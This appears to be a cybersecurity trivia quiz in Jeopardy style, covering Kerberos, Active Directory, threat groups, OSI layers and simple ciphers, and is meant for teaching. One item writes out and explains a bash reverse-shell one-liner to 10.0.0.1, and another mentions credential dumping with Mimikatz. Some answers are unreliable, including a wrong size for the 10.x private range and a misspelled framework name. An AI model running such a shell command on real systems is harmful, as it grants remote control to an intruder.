Security History
This type of cryptographic attack requires the attacker to have access to both plaintext and its corresponding ciphertext and is often used to deduce encryption keys. This cryptographic attack was part of the way that the Enigma code was cracked in WW2.
What is a known plain-text attack?
What is the device Encryption Key?
What does EACH CHARACTER in this command do?
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
bash -i : interactive bash shell
>& redirect to standard out/err
/dev/tcp/ : open a TCP connection
10.0.0.1 : destination IP
4242: destination port
0>&1: redirect to standard in
This is the highest layer of the OSI model, describing the layer that interfaces between users and network applications.
What is the Application layer?
This is a container in Active Directory, that groups objects (users, computers, printers, etc.) together for administrative purposes.
What is an Organizational Unit?
This Israeli surveillance software, allegedly sold to authoritarian regimes, was exposed in 2021 for infecting journalists and activists’ phones. It used a 0 day in iOS.
What is Pegasus, by the NSO group?
Considered the counter framework to MITRE ATT&CK, this knowledge graph is a framework of cybersecurity countermeasures.
What is MITRE D3F3ND?
When this registry key is set, Windows stores clear-text credentials in memory, allowing the device to be vulnerable to LSASS memory dumping attacks using tools like Mimikatz.
What is WDIGEST?
This term refers to the amount of time or “hops” that a packet is set to exist inside a network before being discarded by a router
What is Time To Live (TTL)?
This is is a virtual collection of policy settings that define how users and computers within an Active Directory domain behave.
What is a Group Policy Object (GPO)?
This adversary group stole and then later publicized the ETERNAL-BLUE exploit from the Equation Group. The adversary group disappeared shortly after the theft.
Who are the Shadow Brokers?
This acronym is used to describe vulnerabilities that are known to be used by adversaries in cyber attacks in the wild.
What are KEV (Known Exploited Vulnerabilities)>
What's the plaintext of this ciphertext? PBEERPG
What is CORRECT?
This TCP flag is used to terminate a TCP connection. When this TCP flag is received, the receiving endpoint should immediately discard the connection and any related resources. This is typically used to handle errors or abnormal situations where a connection should be closed abruptly.
What is RST?
This is Window's native web server service. This service can be installed on any Windows server to create a website accessible both internally and externally. This service can also be used for FTP.
What is Internet information Services (IIS)?
This APT group is a hacking group mostly made up of teens and young adults believed to live in the United States and the United Kingdom. This group hacked Casinos and Snowflake. Two teenagers and two young adults were arrested in 2024 for connections to this APT.
Who is Scattered Spider?
This term identifies the last phase of the Lockheed Martin Cyber Kill Chain, in which an attacker carries out their intent during an intrusion campaign. "With 'Hands on Keyboard' access, intruders accomplish their original goals".
What is Actions on Objectives?
If someone ran the command "chmod +256 pass.txt", what are the resulting permissions for pass.txt file and who has those permissions?
OWNER -WRITE
GROUP - READ, EXECUTE
EVERYONE ELSE - READ, WRITE
These three email protocols are used for how email is retrieved, sent, and stored. Each protocol has a distinct port.
What is SMTP (port 25), IMAP (port 143) and POP3 (port 110).
This token is used in Kerberos Authentication to request access tokens from the Ticket Granting Service (TGS) for specific resources/systems joined to the domain.
What is a Ticket Granting Ticket?
This company's Slack instance was breached in July 2024 by a so-called Russian Hacktivist group, consequently losing 1.1 TB of data that was later publicized. A recent ruling found that the attacker was not a Russian hacking group but instead a 25 year old U.S. resident.
What is the Walt Disney Company?
This term describes a technique when attackers modify opened, modified, and created dates on files in order to mislead incident responders during their investigation.
What is timestomping?
What is the plaintext of this ciphertext?
CIPHERTEXT - PBVNGF
ENCRYPTION KEY - ANNANN
The result is POINTS.
These three subnets are the standardized Private (local) IPv4 address ranges.
What are 10.0.0.0/24,192.168.0.0/16, and 172.16.0.0/12?
This critical vulnerability exploits a flaw in the Netlogon Remote Protocol (MS-NRPC), allowing an unauthenticated attacker to impersonate any computer, including the domain controller itself, by sending crafted authentication messages with all-zero values.
What is Zero Logon?